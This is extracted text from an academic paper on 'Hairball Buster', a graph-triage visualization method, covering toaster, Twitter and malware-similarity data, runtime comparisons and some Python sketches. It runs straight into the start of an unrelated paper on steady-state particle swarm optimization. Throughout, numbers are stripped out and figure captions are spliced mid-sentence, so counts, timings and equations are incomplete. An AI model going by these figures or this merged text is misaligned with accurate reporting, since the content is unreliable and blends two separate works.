likely to be just one core group in the toaster community all connected with each other. in contrast, it takes more than one algorithm and manual steps to provide similar data. for example, we ran a histogram on the toaster data set, which connections while k-truss is not available in gephi, it is useful in identifying clusters in data sets. however, when the top nodes are fully or nearly fully connected, the k-truss algorithm will not provide additional useful information about these nodes. third application: hb and temporal graphs a significant benefit of the hb chart approach is that the canonical format allows multiple curves/ graphs to be compared at once. as an example, we divided the toaster data set into blocks of , connections representing approximate slices of the data set over time (since the initial data set was in roughly chronological order). we then compared the hb depictions of the first , node connections with the second and third blocks. figures to show these three batches of nodes and links plotted with the same axis scales for ease of comparison. 
in figure , there is one node above degree , which is a much higher degree than any of the other nodes. the next highest node is around , followed by a couple at and then a fairly smooth curve toward the lowest degrees. figure shows that in this next time period, the -degree node is the highest-ranked node and the -degree nodes are still present, but there is also an interesting bump in the curve around degree . figure also has a figure : force atlas on top nodes in toaster data set. identified the top to nodes as having the highest degree. we then ran gephi, ranking the nodes by degree and manually copied the top nodes to visualize using force atlas . figure shows the results using degree as the node label. while the process took roughly min, hb provided the results in sec for the initial display and then for the inverse display. the gephi example does show highly connected nodes, but does not conclusively show which are fully connected, and required greater time and calculation cost than hb. figure : hb chart of first , connections in toaster data set. hairball buster: a graph triage method for viewing and comparing graphs figure : hb chart of third , connections in toaster data set. figure : hb chart of second , connections in toaster data set. maximum degree node at , but also one at , , and . this third set of , connections also has a ‘bump’ in the curve around degree that is similar to the bump in figure . in typical node-link visualizations, visualizing changing graphs compounds many of the issues associated with visualizing static graphs. in addition, there are new forms of ‘visual noise’: nodes/edges that are displayed or removed without warning, and nodes/edges that move rapidly from one time period to the next without warning (peterson, ). many approaches have been suggested to address these connections issues, but they are computationally expensive and only work well in limited cases (bender-demoll and mcfarland, ; brandes and corman, ; moody et al., ; peterson, ; zweig, ). in contrast, the hb approach is computationally inexpensive and high in information content. hb does not address all of these issues, but allows the analyst to focus on how the centrality of a specific node changes over time, or how the distribution of centrality changes over time. for example, does the shape of the curve change over time? this is shown in figures to for the toaster data set. does the rank of each node change over time? this can be added in a later version of the hb code. see section ‘future features and applications of hb’ for such an approach. fourth application: identifying anomalous features this section describes how hb can be used to quickly identify selected anomalous features in a data set associated with the highest degree nodes, using suspended iranian twitter™ accounts obtained from https://about.twitter.com/en_us/values/elections- integrity.html#data (twitter™, ). this data set for user-id replies with no retweets between nodes included , nodes and , edges. figure was calculated in about sec on a single- threaded laptop, and shows that one node dominated with over , replies. the next two highest nodes had around , replies and just under , replies, respectively. (displaying over , nodes and , links would not be feasible in an adjacency matrix. see section ‘comparing hb to other algorithms’ for comparisons to both the adjacency matrix and blockmodeling.) 
figure shows how much larger the degree of highest node is compared to all other nodes, as well as for the second and third degree nodes. more importantly, this figure shows an interesting pattern in gaps in the reply pattern of these top nodes, as well as the highest of the next lower- degree-ranked nodes. for example, the highest degree mode appears to connect with most of the rest of the nodes except around nodes ranked at k, while the second highest degree node has multiple gaps and the third highest degree node does not appear to connect with about half the nodes. zooming in on the left-hand side, figure shows the same data limited to the first nodes. note that the three top-ranked nodes connected with each other and many other nodes, but did not connect with the next highest-ranked nodes except in one case. what is the reason for such an unusual pattern? the authors do not know for sure, but it may be that nodes through are bots run by a different team than those running the first three nodes. (of the th through th nodes, the th node communicated with most of the other nodes, but most of the rest of the nodes did not communicate with each figure : hb chart of suspended iranian twitter™ accounts, user-id replies, and no retweets. hairball buster: a graph triage method for viewing and comparing graphs other.) in any case, hb is an efficient way to quickly identify areas of interest and further investigation into anomalous data without having to slowly whittle down a huge hairball display. this approach might also be useful in helping identify other twitter™ bots in the future based on similar patterns. fifth application: quickly identify nodes connected by highest-value link weights this section shows how hb can be used to identify key relationships in graphs with link weights. this example uses output data from a tool called codedna™, a patented malware analysis tool developed at jhu/apl that provides a fast, reliable, automated means for recognizing related malware binaries and linking variants. it ‘supports crowd- sourcing of information by providing a robust malware identifier (fingerprint) that is deterministic and repeatable for correlating reports, analyses, and other information about attackers, yet cannot be used to re-create the original malware’ (maughan and carlsten, ). by generating dna-like fingerprints from input files, and computing similarity between these fingerprints, codedna™ can effectively identify clusters of related malware in very large data sets. figure shows some samples of clusters of malware previously produced by codedna™. for purposes of this paper, we obtained a data set based on linux coreutils rather than real malware, and figure : hb chart of suspended iranian twitter™ accounts, user-id replies, no retweets, first nodes showing gaps among the top and the next nodes. processed the data through codedna™ software. figure shows the seven clusters produced by codedna™, where each cluster represents elements of the code that have ‘similarity scores’ between . and . . a similarity score is an output of codedna™ that determines how similar one code binary is to another code binary. in figure , the red lines represent a similarity score of . , meaning the code samples are nearly identical. the blue lines represent the score of . , meaning that roughly % of the code is similar according to codedna’s algorithms. the remaining links between the nodes are shaded between blue and red as the similarity score increases. using . 
using . as the lowest similarity score that defines a related cluster, figure shows that the outputs divide into seven clusters. to challenge the hb approach, we selected the cluster that had the most nodes ( ) and the most links ( ). this is almost a fully connected graph, which would have links.

figure : sample chart of codedna™ cluster outputs of malware binaries. figure : sample codedna™ cluster outputs of linux coreutils binaries.

figure shows the first attempt at displaying this cluster's data in hb. the problem is that many of the nodes have exactly the same rank, which makes it difficult to discern how the nodes relate to each other. it would also be useful to color code the similarity scores of each edge to provide further detail about how these nodes relate to each other. the solution is to offset the nodes slightly on the vertical in order to allow each unique link between nodes to be displayed. in figure , nodes with the same degree are increased or decreased by . so that the monotonically decreasing curve is maintained and is centered on the original degree value. (if there are more than nine nodes with the same degree, use a smaller offset to fit them in between the next whole-number degree rows.) we added a line to connect the nodes to make it easier to see the curve. in addition to the vertical offset, we further color-coded the similarity values of each link or edge. the following colors represent the different ranges of similarity scores: orange = . to , red = . to . , green = . to . , and purple = . to . . note that nodes through have high similarity scores, and a bit less similarity with nodes , , and , even though they share the same degree. nodes through are also similar to the nodes with degree . likewise, nodes through are similar to each other and to the nodes with degree . figure highlights these areas of high similarity by placing purple boxes around them.

figure : sample codedna™ cluster output in standard hairball buster (blue = nodes, gray dots = links). figure : sample codedna™ cluster output in hb with vertical offset.

hb algorithm is canonical

the applications above have illustrated how hairball buster can be used to answer key analytic questions. we now move on to a general discussion of the benefits of the approach and how it compares to similar existing techniques. hb is canonical in the sense that each graph has a unique visual representation. this consistency is a significant benefit, allowing different data sets, or different time slices of the same data set as in section 'third application: hb and temporal graphs,' to be compared, regardless of size. to ensure uniqueness, the ranking of nodes by degree must be consistent, and this ordering must be chosen at the outset. the simplest way to do this is to assign a unique label to each node and sort the labels alphanumerically, thus ensuring a canonical display. this was done 'behind the scenes' in the above applications. another approach is to rank nodes that are tied with the same degree by their connections to the neighbors with the highest rank. for example, all of the one-degree nodes will be 'tied' with each other, but a tie-breaker is the degree of the node to which each is connected. if ties still exist after a first pass, then nodes can be ranked by the neighbors' neighbors. repeat as necessary.
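the simple alphanumeric tie-breaking rule can be written down in a few lines. the sketch below is an illustrative implementation only (the adjacency-dictionary format and function name are our own, not part of the hb code):

```python
def canonical_ranking(adjacency):
    """Rank nodes for an HB chart: primary key is degree (descending),
    ties broken by the node label (ascending), which is the simplest
    rule that makes the display canonical.

    `adjacency` maps each node label to the set of its neighbors."""
    return sorted(adjacency,
                  key=lambda n: (-len(adjacency[n]), str(n)))

# small usage example
adj = {"a": {"b", "c"}, "b": {"a"}, "c": {"a", "d"}, "d": {"c"}}
print(canonical_ranking(adj))   # ['a', 'c', 'b', 'd']
```

the neighbor-based tie-breaker mentioned above could be added by extending the sort key with the sorted degrees of each node's neighbors before falling back to the label.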
if there is still ambiguity between any nodes, simply assign a label to each node and republish the data set so all parties interested in that data set may use the same labels.

hb measures of performance

many traditional graph layout approaches are computationally intensive because they position each node based on distance relative to every other node and on which nodes share (or are otherwise affected by) links. this n computation means that significant time is required to render a single 'hairball' graph with several thousand nodes, and many additional computationally intensive steps may be required to break the hairball into something more readily understandable. in contrast, the hb algorithm has order n log n. for small data sets such as the jazz data set, on a single-threaded laptop there is no noticeable difference in the performance between the two. for large data sets such as the twitter™ data set with over , nodes, however, the difference between n and n log n becomes very significant. table shows experimental results. while the run time is similar for hb and backbone for small data sets, the larger the data set, the better hb performs compared to backbone layout. for k nodes, backbone could not complete in min, whereas hb completed in less than sec. moreover, hb consistently completed for graphs of million nodes in around sec, whereas the backbone algorithm could not be tested because visone could not load this volume of data.

table : performance comparisons for hb versus backbone layout. for each data set (random graphml graphs of increasing size, code-dna, jazz-directed, toaster, and iran-tweet-replies), the table lists file size, number of nodes, number of edges, hb run time, and visone run times for the quad-sim and tri-sim backbone variants; visone could not load the largest graphml file due to insufficient memory.

the hb approach uses python code to calculate the curves and neighbors from networks defined in standard graphml or csv form. it then creates cartesian plots for the actual visualization. the approach could probably be executed much faster if optimized and parallelized. in hb, every node and neighbor location is well defined, easily calculated, and does not change significantly when a new set of nodes or links is added. hb does not answer every question, but it can identify features that help effectively target which subsets of nodes to use as inputs to more computationally intensive algorithms that do answer deeper questions.

hb using other measures of centrality

in addition to degree, hb can also display the rank of the nodes by other centrality measures. these expand the type of questions that can be answered by analysts using hb. we focused on the following measures. the clique count of a node with n neighbors is the count of the $\binom{n}{2}$ neighbor pairs that are connected. the clique count (order ) is the number of node pairs within distance of the node that are connected. the decay centrality of a node i is the weighted sum $\mathrm{decay}(i) = \sum_{j \neq i} \delta^{l(i,j)}$, where $\delta$ is a decay parameter and $l(i,j)$ is the minimum distance from i to j (or infinite if the nodes are in different components). the betweenness centrality of a node measures how likely the node is to lie along the shortest paths between other nodes in the graph. more details on these centrality measures are available in the studies of wasserman and faust ( ) and jackson ( ).

figure : sample codedna™ cluster output in hb with vertical offset and highlighting nodes with highest similarity scores. figure : displaying different measures of centrality in hb (degree centrality, clique count, clique count (order ), decay centrality, and betweenness centrality for the jazz data set and a random-edges graph; order refers to counting the triangles in the subgraph formed from all nodes within two hops of the chosen node, and betweenness centrality is expensive to compute, so that panel lacks the benefit of fast computation).

figure shows the hb visual for each of these measures for both the jazz data set and a randomly generated graph. the resulting figures emphasize how a node's centrality measure is related to those of its neighbors. each chart illustrates major structural differences between the jazz graph and a random graph. for example, in the decay centrality figures, the centrality of neighbors in the jazz data set differs significantly, whereas in the random graph case the decay centrality of neighbors is very similar (note the vertical axis shows values between and only). these examples also show how hb can be applied to floating-point as well as integer-valued metrics. (note that some metric calculations, betweenness centrality in particular, are computationally expensive and may negate some of the performance advantages of the hb approach.)
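for readers who want to reproduce these metrics, the following sketch computes the clique count and decay centrality of a node stored in a plain adjacency dictionary; it is an illustration of the definitions above, not the authors' implementation, and the decay parameter value is an arbitrary example:

```python
from collections import deque
from itertools import combinations

def clique_count(adj, node):
    """Count of neighbor pairs of `node` that are themselves connected
    (the 'n choose 2' pairs mentioned in the definition above)."""
    nbrs = adj[node]
    return sum(1 for u, v in combinations(nbrs, 2) if v in adj[u])

def decay_centrality(adj, node, delta=0.5):
    """Weighted sum of delta**distance over all reachable nodes j != node.
    delta is the decay parameter; 0.5 is only an example value."""
    dist = {node: 0}
    queue = deque([node])
    while queue:                        # breadth-first search for shortest distances
        u = queue.popleft()
        for v in adj[u]:
            if v not in dist:
                dist[v] = dist[u] + 1
                queue.append(v)
    return sum(delta ** d for n, d in dist.items() if n != node)
```

nodes in different components simply never enter `dist`, which matches treating their distance as infinite in the decay sum.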
comparing hb to other algorithms

this section describes how hb differs from other commonly used graph analytic and visualization algorithms. table lists analytic questions and features grouped into three sections: (i) understanding node relationships and graph characteristics, (ii) representing large or directed networks or graphs with weighted links, and (iii) the ability to represent other centrality measures and to represent graphs in a standard format at low calculation cost. these are used to compare hb with several other techniques: a histogram of node centralities, a standard force-directed layout, a backbone layout, a standard adjacency matrix with nodes sorted by degree, and an adjacency matrix where nodes have been ordered based on clusters (i.e., blockmodeling).

the histogram does not provide information about neighbors, connectivity, number of clusters, weighted links, or directedness. similarly, the adjacency matrix cannot represent centrality measures other than degree, has no visual cues for comparing one node's degree to its neighbors or for finding clusters, is not usable for very large data sets, and has no log–log or semi–log representation. (this paper assumes that the adjacency matrix has already been sorted by degree in terms of both rows and columns in order to compare well against hb.) while blockmodeling can depict the number of clusters in a graph, it cannot represent other centrality measures or a log–log or semi–log representation, is not canonical, and requires a large number of calculations. moreover, even when successfully representing clusters, blockmodeling works well only when there are several communities highly connected within blocks and having only sparse connections between blocks. blockmodeling requires at least n calculations, and most references cite n calculations being required (white et al., ; wasserman and faust, ; girvan and newman, ; jackson, ; gopalan et al., ). while force-directed and backbone layout visualizations can show some clustering, they cannot provide the distribution of nodes by degree or the number and identity of the highest degree nodes or their direct connectivity to other high-degree nodes, except in very small data sets. there are also no visual cues as to how much larger one node's degree is compared to another high-degree node. moreover, they do not represent other measures of centrality, are not canonical, and require at least n calculation cost.

table : comparing hb features to other graph analytic and visualization algorithms (hairball buster, histogram/node-degree display, force-directed layout, visone backbone layout, adjacency matrix, and blockmodeling). the features cover the distribution of nodes by degree, quickly determining and identifying the highest-degree nodes, their direct and two-hop connections to other high-degree nodes, which lower-degree nodes connect to them, visual cues for degree differences, whether clusters containing the highest-degree nodes can be identified, log–log or semi–log representation for very large data sets, directed and weighted graphs, other centrality measures, canonical representation, and low calculation cost; table notes qualify cases that hold only for small graphs, when values are available via tooltip display, or when link weights are displayed by color, width, or as attributes of dots in the matrix.

as shown in table , the only algorithms that come close to the hb analytic triage approach in terms of computation time are the adjacency matrix and the node-degree distribution or histogram display. even then, the histogram cannot address six of the features available in hb, while the adjacency matrix cannot address four. overall, hb efficiently presents information about a graph in a single display that is not available in any other single display.

we also compared these approaches visually. figure illustrates five graphs using force-based layout, a histogram, an adjacency matrix, and hb. we have shown in previous sections the variety of questions that can be answered using hb. in contrast, there is little that can be determined directly from the force-based layout except for maybe the preferential attachment graph. while the histogram correlates well with the hb curve, the histogram provides no data whatsoever about the neighbors of the nodes. the adjacency matrix shows little in the way of patterns in these examples, except for the third and fourth graph, although this may be improved by using other node orderings such as those obtained in blockmodeling. an interesting characteristic of hb not previously discussed is also shown in the proximity graph. it is clear from the histogram that the distribution is bimodal, and the adjacency matrix shows a blob in the lower left corner. hb shows not only the cluster in the upper-left corner where most of the high-degree nodes are interconnected, but also that this cluster is mostly disconnected from other parts of the graph; this could not be discovered from the histogram and is difficult to ascertain from the adjacency matrix.

figure : comparing different types of graphs and algorithms (jazz, random edges, watts–strogatz random graph, proximity graph, and preferential attachment, each shown as a force-based layout, a degree distribution, an adjacency matrix, and a neighbor-metric plot (hb)).

optional steps of the hb algorithm

section 'hb approach' presented the six basic steps of the hb algorithm. this section describes four optional steps mentioned in the previous use cases:

1. if one requires the hb chart to be canonical, then rank nodes of the same degree in lexicographic ordering based on the node labels.
2. display the inverse (the gaps) of links to the neighbors.
3. display a log–log or semi–log chart.
4. display nodes with the same metric value using vertical offsets.

displaying the inverse is performed at the time the chart is rendered. rather than displaying the neighbor nodes at their specified x and y coordinates, display dots where there is no neighbor node, as shown in figures and .
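a minimal sketch of the inverse (gap) display, assuming the canonical ranking and adjacency-dictionary structures used in the earlier sketches (the function name and the choice to restrict the display to the top-ranked nodes are ours), could look like this:

```python
def gap_dots(ranking, adj, top=50):
    """For each of the `top` highest-ranked curve nodes (x = rank position),
    return the rank positions of other top-ranked nodes it is NOT connected
    to -- the 'inverse' display that makes missing links among highly
    connected nodes stand out."""
    gaps = []
    for x, node in enumerate(ranking[:top]):
        missing = [x2 for x2, other in enumerate(ranking[:top])
                   if other != node and other not in adj[node]]
        gaps.append((node, missing))
    return gaps
```

because the ranking is already computed for the normal hb chart, producing the inverse view requires no new graph calculations, only a different choice of which dots to draw.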
displaying a log–log or semi–log chart benefits from offsetting the origin by , or , , depending on the size of the original data set, as described in the appendix. displaying multiple nodes with the same centrality measure using vertical offsets makes relationships easier to see. in this case, select the nodes of the same centrality that are of interest, as shown in figures and . calculate the size of the offset based on the number of curve nodes with the same y coordinate that need to fit within the space . above and . below the y-value.

limitations of hb

at the time of this writing, we have identified four limitations of the hb approach. first, if there are two or more nodes with the same degree (or other centrality measure), even though each node on the curve will have a different rank (x-coordinate), their neighbor nodes may land on top of each other. this reduces the ability of the hb display to let an analyst clearly see how the nodes and their neighbors relate to each other, and makes it more difficult to identify which high-degree nodes are connected by two hops. to address this limitation, the hb algorithm and code allow vertical offsets for nodes that share the same degree, as described in section 'optional steps of the hb algorithm.' note that for most social networks, the high-degree nodes tend not to share the same degree, and when they do, usually only a small number share the same degree. for the low-degree nodes, there is little interest in identifying whether one-degree nodes are sharing the same row. if there is a dot above such a node, then that one-degree node is connected to that higher-degree node. if there is no dot above it, then that node is connected to another one-degree node, is not connected to the rest of the graph, and is an outlier. the second limitation is that if the graph has multiple links per pair of nodes, as in a multirelational network (zweig, ), then those will not appear on the hb chart. to address this, one could translate the number of links into a link weight and color-code the weights as shown in figures and . however, if the multiple links each have their own weights, most approaches, including hb, the adjacency matrix, and blockmodeling, would be unable to represent the weights. third, hb is not designed to represent loops, or nodes that connect to themselves. while this is not usually an issue for social network graphs, it is a limitation for the basic hb algorithm. one could apply workarounds, such as a vertical offset if it is not otherwise being used, or one could extend the hb display to a third dimension. fourth, while figure , for example, provides a clear indication of which nodes have the highest degree and whether they are highly connected to other (neighbor) nodes, it can be difficult to identify exactly which of the highest degree nodes are connected to each other due to the large number of nodes being displayed. to solve this display problem, we recommend taking the inverse and displaying the gaps when encountering situations with very large numbers of highly connected nodes, as well as displaying only the top % of the highest-ranked nodes. (this requires no new calculations; just select the range of top nodes to zoom in on.) figure is an example of applying this solution, and clearly shows how few links are missing from the top nodes to be fully connected.

when to use hb

given the strengths and limitations of the hb approach, when should an analyst use or not use hb?
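as one possible implementation of the vertical-offset step described at the top of this section, the sketch below spreads curve nodes that share the same metric value within an assumed band of plus or minus . around that value (the band width and names are assumptions, not the values used by the hb code):

```python
def vertical_offsets(ranking, metric_of, spread=0.5):
    """Assign a y-offset to every curve node so that nodes sharing the same
    metric value are spread within +/- `spread` of that value while the
    curve stays monotonically non-increasing."""
    offsets = {}
    i = 0
    while i < len(ranking):
        j = i
        # collect the run of nodes tied at the same metric value
        while j < len(ranking) and metric_of[ranking[j]] == metric_of[ranking[i]]:
            j += 1
        group = ranking[i:j]
        step = 2 * spread / max(len(group), 1)
        for k, node in enumerate(group):      # higher rank gets the larger offset
            offsets[node] = spread - k * step
        i = j
    return offsets
```

plotting `metric_of[node] + offsets[node]` instead of the raw metric keeps the curve shape intact while separating the neighbor dots of tied nodes.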
the authors recommend that hb be used as the initial algorithm to apply to a data set because of its information density and computational efficiency. as a triage method, hb can provide in the first pass the number of highest degree nodes, how they relate to each other, and how they relate to their neighbors. for graphs with large numbers of nodes that cannot be visually separated in the full hb plot, zooming in on the top nodes provides a computationally inexpensive way to get the same information. the results of this triage can indicate areas of particular interest, such as gaps in the curve or in the neighbor nodes. moreover, if a graph reference library (see section 'future features and applications of hb') is available, the new, unknown data set can be quickly compared to its closest matches among known data sets, thereby suggesting likely underlying structures and algorithms to try next. hb may be less useful for very small graphs, when the structure of the graph is already well understood, when an analyst already knows exactly what metrics to compute, or, as indicated by the limitations above (section 'limitations of hb'), when the graph structure includes multiple links per node pair or links that loop back to the same node.

future features and applications of hb

the first planned future feature is to create a graph reference library (grl) to compare new, unknown graphs to a set of graphs whose underlying structure is known. for example, curves generated by exponential random graph models (ergms) will appear different from known social media data curves. once the known curves closest to the unknown curve have been identified, one can also display their neighbors and compare the neighbor distribution to the unknown graph's neighbor distribution. this can provide a significant benefit to an analyst by quickly recommending known graphs to consider when analyzing a new graph to better understand its underlying structure. this comparison approach could also be automated or semi-automated by using convolutional neural networks to perform these comparisons more thoroughly. note that such a broad range of comparisons is possible because the hb representation is canonical. creation of the grl and the ability to display multiple curves on the same chart for purposes of comparison will be addressed in a subsequent paper. one proposed visualization approach is to provide cross-highlighting or 'brushing' capabilities among different types of displays. for example, mousing over the hb display could not only provide additional information as tooltips but, by connecting to other display types such as backbone layout, also highlight the same nodes in other displays. this ability to cross-highlight selections in multiple displays would provide particular benefit in the examination of temporal displays, identifying which nodes have changed positions in the curve and which have not. an alternative visualization approach for highlighting similarities and differences in temporal graphs is to highlight which nodes have not changed rank by more than one or two, and so on for a selected number of bands identifying such changes. this method of triage will also help analysts quickly focus on similarities and differences in temporal displays.

summary of advantages of hb

hairball buster (or node-neighbor centrality) provides a computationally efficient approach to graph analytic triage. hb provides a unique, canonical representation of any node-link data set.
the ability of hb to provide a standard representation allows different node-link data sets, or different time slices of the same data set, to be compared to identify anomalies or large structural changes. the computational efficiency of hb is on the order of m, where m is the number of links, plus n log n, where n is the number of nodes. because of its computational efficiency, hb can act as a triage method to identify key features of a data set, including whether the curve appears more representative of a social network or a random graph. it can also be used to quickly identify how many high-degree nodes are in the graph, which are the highest-ranked nodes, whether those nodes are connected to each other directly or by two hops, and how connected the higher-ranked nodes are to the lower-ranked nodes. in addition to degree, hb can visualize graphs using other centrality measures such as clique count, decay centrality, and betweenness. this flexibility of hb to represent a wide range of centrality measures is a significant benefit to analysts. this paper also presented differences between hb and the force-directed and backbone layout visualization algorithms. in each case, hb provides greater information density than other algorithms at lower or equal calculation cost. overall, hb presents information about a graph in a single display that is not available in any other single display and can complement the analyst's existing toolkit.

acknowledgments

no external funding was used to develop the hairball buster approach and code. the johns hopkins university applied physics laboratory (jhu/apl) funded a small internal research and development seedling project to develop the initial code in python (developed by co-author mark matties) and java (developed by co-author elisha peterson). the authors would also like to thank the following for providing data sets (cetin savkli for the jazz player data set, matt elder and janis butkevics for the toaster data, bobby seng for the codedna™ data, and mark matties for the iranian twitter™ data), marc johnson for complexity algorithm citations, and roger butler for recognizing that the hb approach was canonical.

references

bender-demoll, s. and mcfarland, d. a. . the art and science of dynamic network visualization. journal of social structure, .
brandes, u. and corman, s. r. . visual unrolling of network evolution and the analysis of dynamic discourse. information visualization, ( ): – .
freeman, l. c. . visualizing social networks. journal of social structure, ( ).
fruchterman, t. m. j. and reingold, e. m. . graph drawing by force-directed placement. software: practice and experience, ( ): – .
ghoniem, m., fekete, j.-d. and castagliola, p. . on the readability of graphs using node-link and matrix-based representations: a controlled experiment and statistical analysis. information visualization, ( ): – .
girvan, m. and newman, m. e. j. . community structure in social and biological networks. proceedings of the national academy of sciences, ( ): – .
gleiser, p. and danon, l. . advances in complex systems, , ; data available at: http://deim.urv.cat/~alexandre.arenas/data/welcome.htm as cited on the konect website: http://konect.uni-koblenz.de/networks/arenas-jazz.
gleiser, p. m. and danon, l. . community structure in jazz. advances in complex systems, ( ): – .
gopalan, p. k., gerrish, s., freedman, m., blei, d. m. and mimno, d. m. . scalable inference of overlapping communities. in pereira, f., burges, c. j. c., bottou, l. and weinberger, k. q. (eds), advances in neural information processing systems. mit press, cambridge, ma, pp. – .
jackson, m. o. . social and economic networks. princeton university press, princeton and oxford.
kamada, t. and kawai, s. . an algorithm for drawing general undirected graphs. information processing letters, ( ): – .
lehmann, k. a. and kottler, s. . visualizing large and clustered networks. in kaufmann, m. and wagner, d. (eds), graph drawing. springer, berlin and heidelberg, pp. – .
maughan, d. and carlsten, n. . transition to practice technology guide. department of homeland security, washington, dc.
moody, j., mcfarland, d. and bender-demoll, s. . dynamic network visualization. american journal of sociology, ( ): – .
nocaj, a., ortmann, m. and brandes, u. . untangling hairballs. in duncan, c. and symvonis, a. (eds), graph drawing. springer, berlin and heidelberg, pp. – .
nocaj, a., ortmann, m. and brandes, u. . untangling the hairballs of multi-centered, small-world online social media networks. journal of graph algorithms and applications, ( ): – .
peterson, e. . time spring layout for visualization of dynamic social networks. ieee network science workshop, pp. – .
shen, z. and ma, k.-l. . path visualization for adjacency matrices. proceedings of the joint eurographics/ieee vgtc conference on visualization, pp. – .
squartini, t., mastrandrea, r. and garlaschelli, d. . unbiased sampling of network ensembles. new journal of physics, ( ).
twitter™ . data set regarding election integrity, available at: https://about.twitter.com/en_us/values/elections-integrity.html#data (accessed november ). periscope, scope and the periscope logo are trademarks of twitter, inc. or its affiliates.
ware, c. . visual thinking for design. elsevier, amsterdam.
wasserman, s. and faust, k. . social network analysis: methods and applications. cambridge university press.
white, h. c., boorman, s. a. and breiger, r. l. . social structure from multiple networks. i. blockmodels of roles and positions. american journal of sociology, ( ): – .
zweig, k. a. . network analysis literacy: a practical approach to the analysis of networks. springer science & business media, wien.

appendix. semi–log and log–log displays for the hairball buster approach

for very large data sets, a cartesian representation of the hb algorithm may not be sufficient to encompass the whole data set.
although the hb approach has been successfully applied to data sets with over , nodes displayed on cartesian coordinates, there exist much larger data sets for which a semi–log or log–log display would be needed to represent all of the data in a single hb chart. (in this appendix, we will always be referring to log-base- .) when simply taking the semi–log or log–log of a data set, we immediately discovered that the display is dominated by the first few nodes, leaving little visual benefit in the remaining part of the chart. see figure a for an example of a log–log display based on the jazz player data set. this does not present particularly useful information to the analyst. however, there is an easy solution to this problem. by adding either or to all of the data points, we are essentially creating an 'offset' of the origin to point , or point , . figure a shows an offset of the origin to the point at coordinates , for the jazz player data set. although a relatively small data set, this example shows how the offset of the origin allows a much smoother and continuous representation of the curve compared to figure a . (one needs to remember that when reading the chart, the origin has been offset.) figure a shows the toaster data set in semi–log format. no offset was needed because the log of one is . since most of the connections are of degree , the origin of zero–zero works. however, the display tool the authors applied would not display anything at a coordinate value of for the y-axis. therefore, we placed the degree-one nodes at the lowest y-value on the semi–log display.

figure a : sample log–log plot of jazz player data set with no offset. figure a : sample offset of origin to , for log–log plot of jazz player data set. figure a : sample offset of origin to , for semi–log plot of toaster data set.

steady state particle swarm

carlos m. fernandes,*, nuno fachada,*, juan-julián merelo and agostinho c. rosa

larsys: laboratory for robotics and systems in engineering and science, university of lisbon, lisbon, portugal; hei-lab—digital human-environment and interactions lab, universidade lusófona de humanidades e tecnologias, lisbon, portugal; department of architecture and computer technology, university of granada, granada, spain. * these authors contributed equally to this work.

abstract

this paper investigates the performance and scalability of a new update strategy for the particle swarm optimization (pso) algorithm. the strategy is inspired by the bak–sneppen model of co-evolution between interacting species, which is basically a network of fitness values (representing species) that change over time according to a simple rule: the least fit species and its neighbors are iteratively replaced with random values. following these guidelines, a steady state and dynamic update strategy for pso algorithms is proposed: only the least fit particle and its neighbors are updated and evaluated in each time-step; the remaining particles maintain the same position and fitness, unless they meet the update criterion. the steady state pso was tested on a set of unimodal, multimodal, noisy and rotated benchmark functions, significantly improving the quality of results and convergence speed of the standard psos and more sophisticated psos with dynamic parameters and neighborhood.
a sensitivity analysis of the parameters confirms the performance enhancement with different parameter settings, and scalability tests show that the algorithm behavior is consistent throughout a substantial range of solution vector dimensions.

subjects adaptive and self-organizing systems, algorithms and analysis of algorithms, artificial intelligence, distributed and parallel computing
keywords bak–sneppen model, particle swarm optimization, velocity update strategy

how to cite this article: fernandes cm, fachada n, merelo j-j, rosa ac. steady state particle swarm. peerj comput. sci. doi /peerj-cs. submitted december, accepted june, published august. corresponding author: carlos m. fernandes, cfernandes@laseeb.org. academic editor: julian togelius. copyright fernandes et al., distributed under creative commons cc-by.

introduction

particle swarm optimization (pso) is a social intelligence model for optimization and learning (kennedy & eberhart, ) that uses a set of position vectors (or particles) to represent candidate solutions to a specific problem. every particle is evaluated by computing its fitness, after which its speed and position are updated according to local and global information about the search. during the search, the particles move through the fitness landscape of the problem, following a simple set of equations that define the velocity (eq. (1)) and position (eq. (2)) of each particle in each time step and drive them heuristically toward optimal regions of a d-dimensional search space. here, eqs. (1) and (2) describe a variant proposed by shi & eberhart ( ) that is widely used in pso implementations. the difference to the original pso is the introduction of the inertia weight parameter $\omega$, which helps (together with $c_1$ and $c_2$) to fine-tune the balance between local and global search. all pso implementations in this paper use inertia weight. the velocity $v_{i,d}$ and position $x_{i,d}$ of the d-th dimension of the i-th particle are therefore updated as follows:

$$v_{i,d}(t) = \omega\, v_{i,d}(t-1) + c_1 r_{1i,d}\left(pbest_{i,d} - x_{i,d}(t-1)\right) + c_2 r_{2i,d}\left(gbest_{i,d} - x_{i,d}(t-1)\right) \quad (1)$$

$$x_{i,d}(t) = x_{i,d}(t-1) + v_{i,d}(t) \quad (2)$$

where $\vec{x}_i = (x_{i,1}, x_{i,2}, \ldots, x_{i,D})$ is the position vector of particle i; $\vec{v}_i = (v_{i,1}, v_{i,2}, \ldots, v_{i,D})$ is the velocity of particle i; $\vec{pbest}_i = (pbest_{i,1}, pbest_{i,2}, \ldots, pbest_{i,D})$ is the best solution found so far by particle i; and $\vec{gbest}_i = (gbest_{i,1}, gbest_{i,2}, \ldots, gbest_{i,D})$ is the best solution found so far by the neighborhood of particle i. the neighborhood of a particle is defined by the network configuration that connects the population and structures the information flow. parameters $r_{1i,d}$ and $r_{2i,d}$ are random numbers uniformly distributed within the range (0, 1), and $c_1$ and $c_2$ are the acceleration coefficients, which are used to tune the relative influence of each term of the formula. most psos use one of two simple sociometric principles for constructing the neighborhood network (which defines the gbest values). gbest (where g stands for global) connects all the members of the swarm to one another; the degree of connectivity of gbest is k = n, where n is the number of particles.
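a minimal sketch of the inertia-weight update in eqs. (1) and (2), assuming numpy arrays for the position, velocity and best-position vectors, is shown below; the parameter values and the optional velocity clamping are illustrative only, not the settings used in the paper:

```python
import numpy as np

rng = np.random.default_rng()

def update_particle(x, v, pbest, gbest, w=0.7298, c1=1.494, c2=1.494, vmax=None):
    """One inertia-weight PSO step for a single particle (eqs. (1) and (2))."""
    r1 = rng.random(x.shape)               # uniform random numbers in (0, 1)
    r2 = rng.random(x.shape)
    v_new = w * v + c1 * r1 * (pbest - x) + c2 * r2 * (gbest - x)
    if vmax is not None:                   # optional velocity clamping
        v_new = np.clip(v_new, -vmax, vmax)
    x_new = x + v_new
    return x_new, v_new
```

in a synchronous pso all particles would be evaluated before `gbest` is refreshed, whereas an asynchronous variant refreshes it immediately after each particle is evaluated; the distinction matters for the update strategies discussed next.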
